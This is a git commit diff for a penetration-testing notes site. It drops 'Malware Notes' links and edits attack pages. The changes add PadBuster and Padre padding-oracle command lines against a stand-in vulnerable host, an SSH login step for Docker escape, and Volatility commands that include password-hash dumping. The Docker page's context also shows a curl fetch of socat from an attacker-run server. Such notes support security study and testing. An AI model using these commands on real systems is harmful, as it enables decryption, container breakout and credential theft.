updated a few contents

hideckies · Jul 28, 2024 · 2fa3b1d · 2fa3b1d
1 parent d8c4d29
commit 2fa3b1d
Show file tree

Hide file tree

Showing 9 changed files with 75 additions and 72 deletions.
diff --git a/src/_components/footer.vto b/src/_components/footer.vto
@@ -21,14 +21,6 @@
         <div class="w-full flex flex-col gap-y-2">
             <h3 class="text-sm opacity-60">OTHER TOOLS</h3>
             <div class="w-full flex flex-col lg:flex-row lg:flex-wrap items-start lg:items-center gap-y-2 lg:gap-3">
-                <a
-                    href="{{ site.malware_notes.url }}"
-                    target="_blank"
-                    rel="noopener noreferrer"
-                    class="hover:brightness-200"
-                >
-                    {{ site.malware_notes.name }}
-                </a>
                 <a
                     href="{{ site.security_links.url }}"
                     target="_blank"

diff --git a/src/_components/header.vto b/src/_components/header.vto
@@ -24,18 +24,6 @@
         <div class="hidden sm:flex w-full h-full items-center justify-center gap-x-3">
 
             {{# Security Links link #}}
-            <a
-                href="{{ site.malware_notes.url }}"
-                target="_blank"
-                rel="noopener noreferrer"
-                alt="{{ site.malware_notes.name }}"
-                title="{{ site.malware_notes.name }}"
-            >
-                <img
-                    src="/assets/img/malware-notes.png" alt="{{ site.malware_notes.name }}"
-                    class="w-8 h-8"
-                />
-            </a>
             <a
                 href="{{ site.security_links.url }}"
                 target="_blank"

diff --git a/src/_components/navigation.vto b/src/_components/navigation.vto
@@ -53,14 +53,6 @@
         <div>
             <h3 class="my-4 text-base text-white opacity-60">OTHER TOOLS</h3>
             <div class="w-full flex flex-col gap-y-1">
-                <a
-                    href="{{ site.malware_notes.url }}"
-                    target="_blank"
-                    rel="noopener noreferrer"
-                    class="text-lg"
-                >
-                    {{ site.malware_notes.name }}
-                </a>
                 <a
                     href="{{ site.security_links.url }}"
                     target="_blank"

diff --git a/src/_data/site.yml b/src/_data/site.yml
@@ -13,10 +13,6 @@ buymecoffee:
 kofi:
   name: Ko-fi
   url: https://ko-fi.com/hideckies
-malware_notes:
-  name: Malware Notes
-  url: https://malware-notes.hdks.org/
-  desc: Sticky notes for malware analysis, research, and techniques.
 security_links:
   name: Security Links
   url: https://security-links.hdks.org/

diff --git a/src/exploit/container/docker/docker-escape.md b/src/exploit/container/docker/docker-escape.md
@@ -7,7 +7,7 @@ tags:
 refs:
     - https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation
     - https://gist.github.com/PwnPeter/3f0a678bf44902eae07486c9cc589c25
-date: 2024-04-13
+date: 2024-07-28
 draft: false
 ---
 
@@ -90,6 +90,16 @@ curl <local-ip>:8000/scp -o socat
 
 <br />
 
+## SSH Login
+
+We might be able to login SSH on the target host if we know the credentials.
+
+```bash
+ssh [email protected]
+```
+
+<br />
+
 ## Mounting
 
 Check disks or mounted folders and we might be able to see the directories of the host system.  

diff --git a/src/exploit/cryptography/algorithm/aes-cbc-padding-oracle-attack.md b/src/exploit/cryptography/algorithm/aes-cbc-padding-oracle-attack.md
@@ -4,29 +4,46 @@ description:
 tags:
     - Cryptography
 refs:
-date: 2022-12-10
+date: 2024-07-28
 draft: false
 ---
 
-## PadBuster
+## Automation
 
-**[PadBuster](https://github.com/AonCyberLabs/PadBuster)** is automated script for performing Padding Oracle attacks. It’s useful to decrypt AES.
+### PadBuster
 
-```sh
-padbuster <url> <encrypted sample> <block size> [options]
-```
-
-Belows are some examples.
+[PadBuster](https://github.com/AonCyberLabs/PadBuster) is an automated script for performing Padding Oracle attacks. It’s useful to decrypt AES.
 
 ```sh
 # Encrypted Sample -> 2hN2bBPw==
 # 16 -> Block site
 # -encoding: 0->Base64, 1->Lower Hex, 2->Upper Hex, 3->NET UrlToken, 4->WebSafe Base64
 padbuster https://vulnerable.com/?data=2hN2bBPw== 2hN2bBPw==  16 -encoding 0
 
+# -bruteforce: Brute force against the first block
+padbuster https://vulnerable.com/?data=2hN2bBPw== 2hN2bBPw== 16 -encoding 0 -bruteforce
+
 # -cookies: specify cookie value
 padbuster https://vulnerable.com/ 2hN2bBPw== 8 -encoding 0 -cookies "secret=2hN2bBPw=="
 
 # -plaintext: specify plain text
 padbuster https://vulnerable.com/ 2hN2bBPw== 8 -encoding 0 -cookies "secret=2hN2bBPw==" -plaintext "user=admin"
 ```
+
+### Padre
+
+[Padre](https://github.com/glebarez/padre) is an advanced exploiter for Padding Oracle attacks against CBC mode encryption.
+
+```sh
+# Cookie
+padre -u 'https://example.com/profile.php' -cookie 'SESS=$' 'ABCD=='
+
+# Path
+padre -u 'https://example.com/profile/$' 'ABCD=='
+
+# -e: Specify encode type ('b64' or 'lhex')
+padre -u 'https://example.com/profile/$' -e lhex '1234abcd...'
+
+# -err: Error response contents pattern (regex)
+padre -u 'https://example.com/profile/$' -err 'Error' 'ABCD=='
+```
diff --git a/src/exploit/memory/memory-forensics.md b/src/exploit/memory/memory-forensics.md
@@ -4,7 +4,7 @@ description: Memory Forensics is the analysis of the volatile memory, mainly Ran
 tags:
     - Forensics
 refs:
-date: 2024-05-29
+date: 2024-07-28
 draft: false
 ---
 
@@ -22,13 +22,17 @@ vol -h
 
 However, it’s recommended to download it from the GitHub repository if you want the latest stable version.
 
+<br />
+
 ## Target: Common
 
 ```bash
 # Print banner
 val -f example.vmem banner
 ```
 
+<br />
+
 ## Target: Linux
 
 ```bash
@@ -43,52 +47,55 @@ vol -f example.vmem linux.malfind.Malfind
 
 ```sh
 # Determine the operating system
-python3 vol.py -f example.vmem windows.info
+vol -f example.vmem windows.info
 
 # Dump password hashes
-python3 vol.py -f example.vmem windows.hashdump
+vol -f example.vmem windows.hashdump
 
 # Print command line history
-python3 vol.py -f example.vmem windows.cmdline.CmdLine
+vol -f example.vmem windows.cmdline.CmdLine
 
 # List all of the processes
-python3 vol.py -f example.vmem windows.pslist
+vol -f example.vmem windows.pslist
 # Scan processes.
-python3 vol.py -f example.vmem windows.psscan.PsScan
+vol -f example.vmem windows.psscan.PsScan
 # List processes in a tree based on their parent process ID.
-python3 vol.py -f example.vmem windows.pstree.PsTree
+vol -f example.vmem windows.pstree.PsTree
 
 # Lists hidden processes
-python vol.py -f example.vmem windows.ldrmodules
+vol -f example.vmem windows.ldrmodules
 
 # Scans for network objects present in a particular windows memory image.
-python3 vol.py -f example.vmem windows.netscan.NetScan
+vol -f example.vmem windows.netscan.NetScan
+
+# Scan for file objects present in a Windows memory image.
+vol -f example.vmem windows.filescan.FileScan
+vol -f example.vmem windows.filescan.FileScan | grep <keyword>
 
-# Scan for file objects present in a windows memory image.
-python3 vol.py -f example.vmem windows.filescan.FileScan
-python3 vol.py -f example.vmem windows.filescan.FileScan | grep <keyword>
+# Scan for MFT file objects present in a Windows memory image.
+vol -f example.vmem windows.mftscan.MFTScan
 
 # Lists process memory ranges that potentially contain injected code.
-python3 vol.py -f example.vmem windows.malfind.Malfind
+vol -f example.vmem windows.malfind.Malfind
 # Dumps
-python3 vol.py -f example.vmem -o dumps windows.malfind.Malfind --dump
+vol -f example.vmem -o dumps windows.malfind.Malfind --dump
 
 # Lists the loaded modules in a particular windows memory image.
-python3 vol.py -f example.vmem windows.dlllist.DllList
+vol -f example.vmem windows.dlllist.DllList
 # Specifies PID
-python3 vol.py -f example.vmem windows.dlllist.DllList --pid <PID>
+vol -f example.vmem windows.dlllist.DllList --pid <PID>
 # Dumps
-python3 vol.py -f example.vmem -o dumps windows.dlllist.DllList --dump
+vol -f example.vmem -o dumps windows.dlllist.DllList --dump
 
 # Dump files
 mkdir dumps
 # --pid: PID of the targets is found by pslist
-python3 vol.py -f example.vmem -o dumps windows.dumpfiles.DumpFiles --pid <target-process-id>
-python3 vol.py -f example.vmem -o dumps windows.dumpfiles.DumpFiles --physaddr <address-of-target-file>
+vol -f example.vmem -o dumps windows.dumpfiles.DumpFiles --pid <target-process-id>
+vol -f example.vmem -o dumps windows.dumpfiles.DumpFiles --physaddr <address-of-target-file>
 ```
 
 <br />
 
 ## Redline
 
-[Redline](https://fireeye.market/apps/211364) is an endpoint security tool which provides host investigative capabilities to users to find signs of malicious activity through memory and file analysis and the development of a threat assessment profile.
+[Redline](https://fireeye.market/apps/211364) is an endpoint security tool which provides host investigative capabilities to users to find signs of malicious activity through memory and file analysis and the development of a threat assessment profile.
diff --git a/src/exploit/reconnaissance/subdomain/subdomain-discovery.md b/src/exploit/reconnaissance/subdomain/subdomain-discovery.md
@@ -5,17 +5,24 @@ tags:
     - DNS
     - Reconnaissance
 refs:
-date: 2024-07-17
+date: 2024-07-28
 draft: false
 ---
 
+## Online Tools
+
+- [Subdomain Finder](https://subdomainfinder.c99.nl/)
+- [nmmapper](https://www.nmmapper.com/)
+
+<br />
+
 ## Automation
 
-Reference: [https://medium.com/@DrakenKun/how-to-find-subdomain-takeover-using-httpx-dig-5c2351d380b4](https://medium.com/@DrakenKun/how-to-find-subdomain-takeover-using-httpx-dig-5c2351d380b4)
+Reference: [How to find subdomain takeover using httpx + dig](https://medium.com/@DrakenKun/how-to-find-subdomain-takeover-using-httpx-dig-5c2351d380b4)
 
 ### Subfinder
 
-To set API keys, add them to `$HOME/.config/subfinder/provider-config.yaml`. See [https://docs.projectdiscovery.io/tools/subfinder/install#post-install-configuration](https://docs.projectdiscovery.io/tools/subfinder/install#post-install-configuration) for details.
+To set API keys, add them to `$HOME/.config/subfinder/provider-config.yaml`. See [the ProjectDiscovery's Documentation](https://docs.projectdiscovery.io/tools/subfinder/install#post-install-configuration) for details.
 
 ```sh
 # -all: Use all sources for enumeration
@@ -50,13 +57,7 @@ site:*.example.com -site:www.example.com
 
 <br />
 
-## Online Tools
-
-- **[nmmapper](https://www.nmmapper.com/)**
-
-<br />
-
 ## Subdomain Takeover
 
-After enumerating, it’s worth to check the [Subdomain Takever](/exploit/reconnaissance/subdomain-takeover).
+After enumerating, it’s worth to check the [Subdomain Takever](/exploit/reconnaissance/subdomain/subdomain-takeover/).
 
diff --git a/src/exploit/reconnaissance/subdomain/subdomain-takeover.md b/src/exploit/reconnaissance/subdomain/subdomain-takeover.md
@@ -12,7 +12,7 @@ draft: false
 
 ## Automation
 
-First we need to enumerate subdomains. See [Subdomain Discovery](/exploit/reconnaissance/subdomain-discovery) for doing that.  Then we can httpx for checking HTTP response status for each subdomain.
+First we need to enumerate subdomains. See [Subdomain Discovery](/exploit/reconnaissance/subdomain/subdomain-discovery/) for doing that.  Then we can httpx for checking HTTP response status for each subdomain.
 
 ### httpx